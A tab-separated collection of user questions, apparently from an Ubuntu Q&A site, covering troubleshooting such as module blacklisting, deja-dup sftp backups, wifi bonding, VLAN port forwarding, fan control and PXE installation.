459671	blacklisted module is still loaded ?	i have a problem with the module ivtv_alsa being loaded despite me having blacklisted it . no other module depends on it : # lsmod | grep ivtv module size used by ivtv_alsa 13768 1 ivtv 165297 2 ivtv_alsa cx2341x 28331 1 ivtv i2c_algo_bit 13564 1 ivtv v4l2_common 21457 5 ivtv , tuner , msp3400 , saa7115 , cx2341x videodev 130172 8 ivtv_alsa , ivtv , tuner , msp3400 , saa7115 , cx2341x , v4l2_common tveeprom 21249 1 ivtv snd_pcm 102477 6 ivtv_alsa , snd_hda_codec_hdmi , snd_oxygen_lib , snd_hda_intel , snd_hda_codec snd 69533 29 ivtv_alsa , snd_hda_codec_hdmi , snd_virtuoso , snd_oxygen_lib , snd_mpu401_uart , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device ( i did read the other topics on the matter on this forum , but the answers from those did not help . ) i have tried creating a blacklist-ivtv-alsa.conf in /etc/modprobe.d containing blacklist ivtv_alsa and also tried to change it to blacklist ivtv-alsa the module still gets loaded , and this prevents my pm/sleep.d script from unloading the ivtv module . i have found that it 's pulseaudio that uses the ivtv-alsa module , so if do killall pulseaudio & & sudo rmmod ivtv_alsa it gets unloaded . the only remedy so far has been to delete the ivtv_alsa.ko module file . and yes , i did also try to do sudo update-initramfs -u after the blacklisting . is there anything else to do ? i 'm at a loss , and i do n't want to have to delete the module after each kernel update - it 's a manual step that does not fit well with an automated update system . fyi : i use ivtv for my tv capture card , but the ivtv_alsa module is not required - it works perfectly well without it .
459674	why standard output is not printed on command line ?	i 'm new in programming . i run simple c++ program , like this : # include < iostream > int main ( int argc , char *argv [ ] ) { std : :cout < < `` what ? `` ; } by using the terminal by typing g++ program.cpp . no error is returned after compiling , but the standard output is not shown on the line , which i think it sohould return what ? as typed after std : :cout < < . what can be the cause why the standard output is not shown in terminal ?
459676	stopping output to /dev/tty	i have to use a compiled program on a shared system which outputs a line on startup by opening /dev/tty and writing to that . this means the output is not on standard error or standard out . > 2 > or other bash-based redirection syntax wo n't stop it . here 's the output of an strace : 16760 open ( `` /dev/tty '' , o_rdwr|o_noctty ) = 4 16760 write ( 4 , `` here 's a helpful tip ! `` ... , 87 ) = 87 16760 close ( 4 ) = 0 i call this helpful program from bash and perl scripts , and there 's nothing i can do to keep the output of these scripts clean . if i need to call this thing 50 times i get 50 lines , but even one is incongruous and ugly . there 's no command line option to stop it , and i can not edit the file to put a null at the beginning of the string . i need to use this command because it has rights i do not have . i ca n't just move /dev/tty , because it 's a shared machine . i 've put up with this a long time and now i 'm just fed up . so i come to you good folks hoping someone knows a trick to trap or disable /dev/tty output . ideas ?
459679	deja-dup ssh method does n't work - writes locally instead	after years of rsync , i 'm giving deja-dup a try . not so successful , so far : every attempt to have it write its backup via ssh results in a local directory tree opened at the directory where the deja-dup frontent got started : for the record : user and server are set with the configuration utility , the backup is supposed to go to the directory /export/dumps/notebookhost/user/deja-dup using a small directory as source for the backup , for the sake of testing ... result : a local directory of /home/user/sftp : /user/server/export/dumps/notebookhost/user/deja-dup containing the backup ( imagine this in a backup schedule of the home directory - each time it got called , it would bloat the homedirectory with backup+homedirectory , until the filesystem boundary is reached ) calling duplicity from the command-line works as it should - both using scp or sftp - once a keyphraseless public ssh key gets installed at the target host : duplicity sampledir scp : //user @ host//export/dumps/client/home/user/deja-dup/ duplicity sampledir sftp : //user @ host//export/dumps/client/home/user/deja-dup/ but even after these methods are tried and verified ( and the local mess cleaned ) , the frontend deja-dup still creates local directory structures starting at `` sftp : '' omitting the username in the configuration results in omitting the username in the ( local ) path . padding with /-es in strategic places only resulted in % 2f-es added to the path . if `` custom location '' is selected , the last uri generated for ssh is displayed as : sftp : //192.168.178.12/export/dumps/client/home/user/deja-dup this location is missing a / to successfully write somewhere else but the users homedirectory , however , it fails the same way as when selected through the `` ssh '' menu item . i tried to replace sftp with scp and ssh and only got differently named local directories . quoting the uri does not work , since in that case it gets the path to the local homedirectory preprended . escaping parts of the uri does n't work either - the escape character gets inserted into the local directory name literally . next try : using dconf-editor to circumvent parsing in the configuration tool . org.gnome.dejadup.file path 'sftp : //user @ host:22//export/dumps/client/home/user/deja-dup/' it 's possible to add single quotes ( as in all other strings ) around the uri there . unfortunately , this only results in a local directoryname starting with a single quote , as soon as deja-dup -- backup is called ... bug 908791 backing up to ftp or sftp , creates `` sftp : '' or `` ftp : '' folder in deja-dup launch place seems to describe this since dec 2011 , but is not resolved . the package python-paramiko is ( has been ) installed . update : when trying to access the remove filesystem via sftp in nautilus ( enter ^l to access the location bar , entered sftp : //user @ host/export/dumps/client/user/ as uri , the same weird path /home/user/sftp : /user @ host/.. gets constructed and echoed in the error message ( /home/user being the current working directory ) : unable to find the requested file . please check the spelling and try again . unhandled error message : error when getting information for file '/home/user/sftp : /user @ host/ ... ' : no such file or directory .
459680	unable to connect mobile broadband in ubuntu 14.04 lts	i recently upgraded ubuntu to 14.04 lts when i plug the modem i have a mobile broadband option in network menu bar , and i add new mobile broadband connection , and everything is fine . but , when i try to connect it , it connects , then suddenly the mobile broadband stops working and ca n't connect to the internet . when i unplug and plug it starts working . and again stops working . . so i have to unplug it and plug it again in my laptop to display the mobile broadband option . . . i connect it again , and disapear again . . . how can i connect to my mobile broadband ? i am using huawei modem under ubuntu 14.04 lts operating system
459684	logwatch : illegal users & font color	i am using logwatch on my ubuntu 12.04 lts server . i get the results by e-mail . there are two aspects i would like to customize , but i ca n't find how : under sshd section , there is : illegal users from : , which lists the ip addresses , the reverse dns and the number of attempts . i would also like it to show the illegal usernames that was tried . the headers of the tables are blue text on blue background . it is just impossible to read . is there a way to change that ? i tried changing the perl script and replacing the word blue with red . nothing is red in the e-mails i get . so it should be elsewhereâś thank you very much for your help .
459685	14.04 installer crashed because of low disk space	my computer has a 500gb hard drive and i did the delete everything choice , but i am getting an error when trying to install ubuntu 14.04 lts help ... it 's older hardware ...
459687	ubuntu 14.04 - bonding 2 wifi cards	i 'm trying to bond 2 wifi cards in ubuntu 14.04 . i 've installed ifenslave-2.6 , then changed /etc/network/interfaces and added a /etc/wpa_supplicant0.conf and /etc/wpa_supplicant1.conf file as below . can not make it work , please advise . the 2 wifi cards show connected though , see iwconfig below . also find below also diagnostic messages . i tried all sorts of variations of wpa details in interfaces file , up and down with ifenslave in interfaces , no luck . thank you . /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback iface eth1 inet manual # wlan0 is manually configured , and slave to the `` bond0 '' bonded nic allow-hotplug wlan0 auto wlan0 iface wlan0 inet manual bond-master bond0 bond-primary wlan0 wpa-conf /etc/wpa_supplicant0.conf # wlan1 ditto , thus creating a 2-link bond . allow-hotplug wlan1 auto wlan1 iface wlan1 inet manual bond-master bond0 wpa-conf /etc/wpa_supplicant1.conf # bond0 is the bonding nic and can be used like any other normal nic . # bond0 is configured using static network information . auto bond0 iface bond0 inet static address 192.168.3.150 netmask 255.255.255.0 gateway 192.168.3.1 bond-mode balance_rr bond-miimon 100 bond-slaves wlan0 wlan1 # up /sbin/ifenslave-2.6 bond0 wlan0 wlan1 # down /sbin/ifenslave-2.6 -d bond0 wlan0 wlan1 # bond-slaves none /etc/wpa_supplicant0.conf network= { ssid= '' myssid0 '' bssid=88 : f0:77 : fd : af:81 proto=rsn key_mgmt=wpa-psk pairwise=ccmp tkip group=ccmp tkip psk= '' mypass '' } /etc/wpa_supplicant1.conf network= { key_mgmt=none ssid= '' myssid1 '' } diagnostic messages cat /proc/net/bonding/bond0 ethernet channel bonding driver : v3.7.1 ( april 27 , 2011 ) bonding mode : load balancing ( round-robin ) mii status : up mii polling interval ( ms ) : 100 up delay ( ms ) : 200 down delay ( ms ) : 200 slave interface : wlan0 mii status : up speed : unknown duplex : unknown link failure count : 0 permanent hw addr : 00:1c : df : d1:98:27 slave queue id : 0 sudo iwconfig wlan1 ieee 802.11abg essid : '' myssid1 '' mode : managed frequency:2.462 ghz access point : 00:3a:9a:1c:1b:20 bit rate=24 mb/s tx-power=200 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=38/70 signal level=-72 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 bond0 no wireless extensions . eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' myssid0 '' mode : managed frequency:2.462 ghz access point : 58:35 : d9 : c6:26:41 bit rate=57.8 mb/s tx-power=27 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on link quality=52/70 signal level=-58 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:3 invalid misc:0 missed beacon:0 ifconfig bond0 link encap : ethernet hwaddr 00:1c : df : d1:98:27 inet addr:192.168.3.150 bcast:192.168.3.255 mask:255.255.255.0 inet6 addr : fe80 : :21c : dfff : fed1:9827/64 scope : link up broadcast running master multicast mtu:1500 metric:1 rx packets:2 errors:0 dropped:0 overruns:0 frame:0 tx packets:59 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:304 ( 304.0 b ) tx bytes:10695 ( 10.6 kb ) eth0 link encap : ethernet hwaddr 00:23:5a:1a:47:8a inet addr:192.168.2.1 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :223:5aff : fe1a:478a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2315 errors:0 dropped:0 overruns:0 frame:0 tx packets:2191 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:191033 ( 191.0 kb ) tx bytes:172354 ( 172.3 kb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:407 errors:0 dropped:0 overruns:0 frame:0 tx packets:407 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:43747 ( 43.7 kb ) tx bytes:43747 ( 43.7 kb ) wlan0 link encap : ethernet hwaddr 00:1c : df : d1:98:27 up broadcast running slave multicast mtu:1500 metric:1 rx packets:2 errors:0 dropped:0 overruns:0 frame:0 tx packets:59 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:304 ( 304.0 b ) tx bytes:10695 ( 10.6 kb ) wlan1 link encap : ethernet hwaddr 00:1c : df : d1:98:27 inet6 addr : fe80 : :21c : dfff : fed1:9827/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4 errors:0 dropped:4 overruns:0 frame:26088 tx packets:7 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:684 ( 684.0 b ) tx bytes:805 ( 805.0 b ) interrupt:18 ping 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . from 192.168.3.150 icmp_seq=1 destination host unreachable from 192.168.3.150 icmp_seq=5 destination host unreachable from 192.168.3.150 icmp_seq=6 destination host unreachable from 192.168.3.150 icmp_seq=7 destination host unreachable from 192.168.3.150 icmp_seq=8 destination host unreachable
459688	workaround for importing bookmarks in epiphany browser ( gnome 3.10 ) ?	since gnome 3.10 epiphany seems to have a bug in the import process for bookmarks . the prompt simply does not react when hitting the button , so i am searching for a proper workaround . what did not work out : i have backups of my previous gnome 3.8 installation , so i can access all the files . the folder .config/epiphanylists the two files bookmarks.rdfand bookmarks.xml , but editing these manually does not change anything . launch epiphany - the entries are gone . what 's working : i could edit the files session_state.xml and states.xml . edits were kept after launching the application again . is there any other workaround or file i could edit ?
459690	unable to get a temperature reading from cpu	following instructions over here , i tried to get something running to show the temperature of my amd a6 6400k . unfortunately , the output i get is the following : turionpowercontrol 0.44-rc2 ( export ) turion power states optimization and control - by blackshard detected processor : family 15h ( bulldozer/interlagos/valencia ) processor machine has 1 nodes processor has 1 cores processor has 7 p-states processor has 2 boost states processor temperature slew rate:9.0째c temperature table : node 0 c0:0 done . this does n't tell me anything , unfortunately , and lm-sensors also shows an unrealistic temperature reading near freezing point , when the bios reports an idle temperature of about 30 degrees ( c ) . the temperature readout from byobu also shows unrealistic temperatures of about 10 degrees . so either i 'm doing something wrong , i perhaps i need to find another program . any suggestions ? i 'm trying to figure out why the computer freezes after a few minutes of gpu-intensive work ( gpu built into cpu ) , but i ca n't tell if it 's the temperature or not , since i have no readouts .
459691	how do i install a specific version of java on ubuntu	i am trying to build android from source and it require java 1.6 to build . so , i installed openjdk version 6 . however , when i try to build using the make command i get the following message : your version is : java version `` 1.6.0_31 '' . the correct version is : java se 1.6 . can anyone tell me how do i install the correct version required for building the code ? thanks ! edit : the output of java -version is : java version `` 1.6.0_31 '' openjdk runtime environment ( icedtea6 1.13.3 ) ( 6b31-1.13.3-1ubuntu1 ) openjdk 64-bit server vm ( build 23.25-b01 , mixed mode )
459692	where is application data for the ubuntu touch core apps stored in ubuntu desktop ?	i am looking to sync data for my ubuntu touch apps in trusty tahr , and wanted to know where to find their application data . e.g. , what is the file location for browser bookmarks , notes , and calendar appointments data ?
459699	how can i make compiz have the genie minimize animation ?	i 've installed ccsm and the extra compiz plugins , now i want to make minimize and unminimize animations have the genie effect ( aka the minimize effects on os x ) . how can i do this in ccsm ?
459701	tiger : `rtm` is listening on socket xxxx	on my ubuntu serve 12.04 lts , tiger is reporting a lot of stuffs like this : old : -- warn -- [ lin002i ] the process `rtm ' is listening on socket 60404 ( udp ) on every interface . new : -- warn -- [ lin002i ] the process `rtm ' is listening on socket 60007 ( udp ) on every interface . what is rtm ? why does it need to open ports ? is it safe to block it ? if so , how can i do that , since i can not know which port will be used in advanceâś
459705	3 monitors and 2 video cards problem with ubuntu	i`m totally new to ubuntu . my pc settings ( hardware ) : 2 video cards ( gtx 650 ) with sli 3 monitors + 1 tv connections . i have installed the ubuntu 12.04 and after the install the left and right and tv screens where working . after long search on the web i found how to install the nvidia drivers and when i tried to control the screens and disable the tv , i got an error message : can`t save the configuration file ... . search the web did find a solution that worked on my pc . at the moment i disconnected the other 3 monitors ( left , right , tv ) so i could see in the middle monitor . i refuse to believe that windows can do it and handle thus 3 monitores + tv and ubuntu ( linux ) can`t . i tried to find a solution for this on line but failed . any help on how to do it ? thank you
459707	different fan behaviour in my laptop after upgrade , what to do now ?	after upgrading from lubuntu 13.10 to 14.04 the fan of my laptop seems to run much more often than in 13.10 . when it runs , it does n't run continously but starts and stops every second . fwts fan results in results generated by fwts : version v14.03.01 ( 2014-03-27 02:14:17 ) . some of this work - copyright ( c ) 1999 - 2014 , intel corp. all rights reserved . some of this work - copyright ( c ) 2010 - 2014 , canonical . this test run on 12/05/14 at 21:40:13 on host linux einstein 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:30:00 utc 2014 x86_64 . command : `` fwts fan '' . running tests : fan . fan : simple fan tests . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- test 1 of 2 : test fan status . test how many fans there are in the system . check for the current status of the fan ( s ) . passed : test 1 , fan cooling_device0 of type processor has max cooling state 10 and current cooling state 0 . passed : test 1 , fan cooling_device1 of type processor has max cooling state 10 and current cooling state 0 . passed : test 1 , fan cooling_device2 of type lcd has max cooling state 15 and current cooling state 10 . test 2 of 2 : load system , check cpu fan status . test how many fans there are in the system . check for the current status of the fan ( s ) . loading cpus for 20 seconds to try and get fan speeds to change . fan cooling_device0 current state did not change from value 0 while cpus were busy . fan cooling_device1 current state did not change from value 0 while cpus were busy . advice : did not detect any change in the cpu related thermal cooling device states . it could be that the devices are returning static information back to the driver and/or the fan speed is automatically being controlled by firmware using system management mode in which case the kernel interfaces being examined may not work anyway . ================================================================================ 3 passed , 0 failed , 0 warning , 0 aborted , 0 skipped , 0 info only . ================================================================================ 3 passed , 0 failed , 0 warning , 0 aborted , 0 skipped , 0 info only . test failure summary ================================================================================ critical failures : none high failures : none medium failures : none low failures : none other failures : none test |pass |fail |abort|warn |skip |info | -- -- -- -- -- -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ fan | 3| | | | | | -- -- -- -- -- -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ total : | 3| 0| 0| 0| 0| 0| -- -- -- -- -- -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ here is the output of lsmod lsmod module size used by i8k 14421 0 zram 18478 2 dm_crypt 23177 0 gpio_ich 13476 0 dell_wmi 12761 0 sparse_keymap 13948 1 dell_wmi snd_hda_codec_hdmi 46207 1 snd_hda_codec_idt 54645 1 rfcomm 69160 0 arc4 12608 2 dell_laptop 18168 0 bnep 19624 2 dcdbas 14928 1 dell_laptop bluetooth 395423 10 bnep , rfcomm iwldvm 232285 0 mac80211 626511 1 iwldvm snd_hda_intel 52355 3 snd_hda_codec 192906 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec snd_pcm 102099 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30144 1 snd_seq_midi coretemp 13435 0 kvm_intel 143060 0 kvm 451511 1 kvm_intel snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi joydev 17381 0 serio_raw 13462 0 iwlwifi 169932 1 iwldvm pcmcia 62299 0 snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29482 2 snd_pcm , snd_seq lpc_ich 21080 0 cfg80211 484040 3 iwlwifi , mac80211 , iwldvm yenta_socket 41027 0 pcmcia_rsrc 18407 1 yenta_socket pcmcia_core 23592 3 pcmcia , pcmcia_rsrc , yenta_socket binfmt_misc 17468 1 snd 69238 17 snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_hda_codec_idt , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi soundcore 12680 1 snd parport_pc 32701 0 mac_hid 13205 0 ppdev 17671 0 lp 17759 0 parport 42348 3 lp , ppdev , parport_pc firewire_ohci 40409 0 psmouse 102222 0 sdhci_pci 23172 0 sdhci 43015 1 sdhci_pci firewire_core 68769 1 firewire_ohci crc_itu_t 12707 1 firewire_core ahci 25819 2 libahci 32168 1 ahci i915 783485 2 wmi 19177 1 dell_wmi i2c_algo_bit 13413 1 i915 drm_kms_helper 52758 1 i915 e1000e 254433 0 drm 302817 3 i915 , drm_kms_helper ptp 18933 1 e1000e pps_core 19382 1 ptp video 19476 1 i915 i tried one answer to the similar question : loud fan on ubuntu 14.04 and created a /etc/i8kmon.conf like the following : # run as daemon , override with -- daemon option set config ( daemon ) 1 # automatic fan control , override with -- auto option set config ( auto ) 1 # status check timeout ( seconds ) , override with -- timeout option set config ( timeout ) 2 # report status on stdout , override with -- verbose option set config ( verbose ) 1 # temperature thresholds : { fan_speeds low_ac high_ac low_batt high_batt } set config ( 0 ) { { 0 0 } -1 55 -1 55 } set config ( 1 ) { { 0 1 } 50 60 55 65 } set config ( 2 ) { { 1 1 } 55 80 60 85 } set config ( 3 ) { { 2 2 } 70 128 75 128 } with this setup the fan goes on even if the temperature is below 50 degree celsius ( i do n't see a pattern ) . however i get the impression that the cpu got 's hotter in average than without this file . what changes from 13.10 to 14.04 may be responsible for this ? if this is a bug , for which package i should report the bug ?
459708	my software-center does not respond when i try to start it	i tried these methods already : remove purgely and re-install software-center , restart computer . but it does not work . please see the image : when i use command line to start , it has these outputs : 2014-05-02 13:48:49,812 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-05-02 13:48:50,433 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2014-05-02 13:48:50,434 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2014-05-02 13:48:50,438 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2014-05-02 13:48:50,438 - root - error - could not find any typelib for launchpadintegration 2014-05-02 13:48:50,470 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) how should i solve the problem ?
459710	what happened to my settings ?	i removed libreoffice because i use kingsoft office for everything ( since i come from microsoft office , i find it simpler to use ) . but now , this happened to my settings : most of the options are gone , there are just five left . what should i do ? reinstalling libreoffice did n't do anything . thanks in advance ! p.s . : i 'm not quite professional and i do n't know much about ubuntu , since i 'm now using it two days . please keep it simple for a noob like me . : )
459713	how to install propetary drivers for old ati cards on latest ubuntu distros ?	i would like to install the driver for my video card . it belongs to the following family : legacy driver for amd radeonâ˘ hd/mobility radeonâ˘ hd 4000 , hd 3000 and hd 2000 series cards : http : //support.amd.com/en-us/download/desktop/legacy ? product=legacy2 & os=linux and , as you can see from the link , they are only for xorg 6.9 to xserver 1.12 and kernel version up to 3.4 . since ubuntu 14.04 has xserver 1.15 , how could i install them on my pc ? is it possible to downgrade xserver ?
459714	port forwarding out multiple vlan interfaces that have same ip address	so i have an ubuntu machine with multiple vlan on an interface eth1 and each vlan has the same ip address ( 172.16.0.2 ) . i need to be able to simultaneously telnet into a rack of devices that are also the same ip ( 172.16.0.1 ) . the only way i can think of to do this is through iptables forwarding traffic to specific destination ports out a particular interface . for example i want to be able to run `` telnet 172.16.0.1 12001 '' and have this go out interface eth1.101 directed to 172.16.0.1:23 or run `` telnet 172.16.0.1 12002 '' and have this go out interface eth1.102 directed to 172.16.0.1:23 . i 've tried quite a few iptables setups with no success yet . are there any iptables gurus who could assist in such a setup ? eth0 link encap : ethernet hwaddr c8:60:00:85:22 : be inet addr:10.0.152.86 bcast:10.0.152.255 mask:255.255.255.0 inet6 addr : fe80 : :ca60 : ff : fe85:22be/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:399596 errors:0 dropped:0 overruns:0 frame:0 tx packets:416603 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:55610834 ( 55.6 mb ) tx bytes:562660002 ( 562.6 mb ) eth1 link encap : ethernet hwaddr 68:05 : ca:16 : f6:72 inet addr:172.16.0.2 bcast:172.16.0.255 mask:255.255.255.0 inet6 addr : fe80 : :6a05 : caff : fe16 : f672/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:95 errors:0 dropped:0 overruns:0 frame:0 tx packets:55215 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8580 ( 8.5 kb ) tx bytes:11943374 ( 11.9 mb ) interrupt:16 memory : febe0000-fec00000 eth1.101 link encap : ethernet hwaddr 68:05 : ca:16 : f6:72 inet addr:171.16.0.2 bcast:171.16.0.255 mask:255.255.255.0 inet6 addr : fe80 : :6a05 : caff : fe16 : f672/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:47 errors:0 dropped:0 overruns:0 frame:0 tx packets:145 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:3222 ( 3.2 kb ) tx bytes:24388 ( 24.3 kb ) eth1.102 link encap : ethernet hwaddr 68:05 : ca:16 : f6:72 inet addr:171.16.0.2 bcast:171.16.0.255 mask:255.255.255.0 inet6 addr : fe80 : :6a05 : caff : fe16 : f672/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:48 errors:0 dropped:0 overruns:0 frame:0 tx packets:78 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:3268 ( 3.2 kb ) tx bytes:11718 ( 11.7 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:59 errors:0 dropped:0 overruns:0 frame:0 tx packets:59 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:5010 ( 5.0 kb ) tx bytes:5010 ( 5.0 kb ) user @ machine ~ $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.0.152.1 0.0.0.0 ug 0 0 0 eth0 10.0.152.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 171.16.0.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1.101 171.16.0.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1.102 172.16.0.0 0.0.0.0 255.255.255.0 u 1 0 0 eth1
459716	natural scrolling does n't work in evince	i have enabled the reversed scrolling option in the mouse and touchpad section of the settings app . natural scrolling is thus enabled everywhere in the system , with evince being the only exception . how do i fix this ?
459717	flash disk recovery with corrupted partition table	i 'm trying to restore a flash drive ( verbatim store n go ) using testdisk / photorec . the disk capacity reported is already wrong , so i suspect it 's related to a corrupted partition table : select a media ( use arrow keys , then press enter ) : ... > disk /dev/sdb - 2097 kb / 2048 kib ( ro ) - verbatim store n go ... starting a search using photorec reports this as disk content : disk /dev/sdb - 2097 kb / 2048 kib ( ro ) - verbatim store n go partition start end size in sectors no partition 0 0 1 1023 0 4 4096 [ whole disk ] > 1 p fat32 lba 2016 0 1 1951743 0 4 7798912 starting recovery results in no files found . my guess is that is that photorec is not able to find the correct file boundaries as it uses a wrong disk geometry ( since i suppose it deducts this from the partition table ) . i 've already tried dmesg | tail -n 20 [ 3677.283170 ] usb-storage 1-6:1.0 : usb mass storage device detected [ 3677.284637 ] scsi6 : usb-storage 1-6:1.0 [ 3678.309339 ] scsi 6:0:0:0 : direct-access verbatim store n go 5.00 pq : 0 ansi : 0 ccs [ 3678.310105 ] sd 6:0:0:0 : attached scsi generic sg2 type 0 [ 3679.013321 ] sd 6:0:0:0 : [ sdb ] 4096 512-byte logical blocks : ( 2.09 mb/2.00 mib ) [ 3679.014054 ] sd 6:0:0:0 : [ sdb ] write protect is off but this just shows the same size as photorec already did . my questions thus are : would knowing the correct disk geometry ( chs ) make it possible for me to still restore this flash drive ? is there any tool / way to get these disk geometry values ? ... any other pointers on disk recovery i have n't thought about ? thx !
459719	using ap-hotspot to share a proxy connection	i know i can use ap-hotspot to configure a wifi hotspot in normal connection . but what is i 'm connected to internet via a socks proxy ? how can i share internet to my mobile devices then ?
459720	14.04 : password not accepted after computer wakes up from sleep	if i press ctrl+alt+l to lock the screen , i can get back in by typing my password . if i put the computer to sleep , wake it back up again , i can not log in anymore because it says the password is invalid . the password is valid , because when i press ctrl+f1 to go to tty1 i can log in using my username and this exact password . ctrl-f7 back to unity , the same password is invalid , and i have to restart in order to log back in . very annoying . the problem is reproducible every time the computer goes to sleep . i have an intel hd4000 graphic and i 'm using opensource drivers . the system is 14.04 with the latest updates through the official channel .
459721	14.04 server pxe installation fails at `` configure the network '' page	tried unattended pxe install , it fails at this page network autoconfiguration failed your network is probably not using the dhcp protocol . alternatively , the dhcp server may be slow or some network hardware is not working properly . < continue > my dhcp server works fine with 12.04 and all other linux distributions , such as rhel and sles . more importantly , pxelinux.0 is fetched over and the kernel and initrd are downloaded and started . so i assume this should be a client problem instead of server 's . in particular , the 14.04 installer problem . jump to a shell in the installer , found ifconfig is not available . tried dhclient , it returns no error ( return code is 0 too ) but still can not ping the pxe or dhcp servers . the error for failed ping is `` network is unreachable '' . tcpdump shows there is not any dhcp request on the dhcp server after the initial one in pxe . lspci shows all the nics . 01:00.1 ethernet controller : intel corporation 82540em gigabit ethernet controller ... any idea what could have gone wrong ? other info : ip link shows the interface is p1p1 but /etc/network/interface shows only eth0 is configured . ~ # ip link 1 : lo : < loopback , up , lower_up > mtu 65536 qdisc noqueue link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2 : p1p1 : < broadcast , multicast > mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:22:99 : b2:00:12 brd ff : ff : ff : ff : ff : ff 3 : p2p1 : < broadcast , multicast > mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:22:99 : b2:00:14 brd ff : ff : ff : ff : ff : ff 4 : p3p1 : < broadcast , multicast > mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:22:99 : b2:00:10 brd ff : ff : ff : ff : ff : ff 5 : eth3 : < broadcast , multicast > mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:22:99 : b2:00:16 brd ff : ff : ff : ff : ff : ff 6 : rename6 : < broadcast , multicast > mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:22:99 : b2:00:17 brd ff : ff : ff : ff : ff : ff 7 : p2p2 : < broadcast , multicast > mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:22:99 : b2:00:11 brd ff : ff : ff : ff : ff : ff 8 : p4p1 : < broadcast , multicast > mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:22:99 : b2:00:13 brd ff : ff : ff : ff : ff : ff 9 : p5p1 : < broadcast , multicast > mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:22:99 : b2:00:15 brd ff : ff : ff : ff : ff : ff /etc/network # cat interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 172.25.0.101 netmask 255.255.255.0 network 172.25.0.0 broadcast 172.25.0.255 gateway 172.25.0.1 # dns-* options are implemented by the resolvconf package , if installed dns-nameservers 172.25.0.1
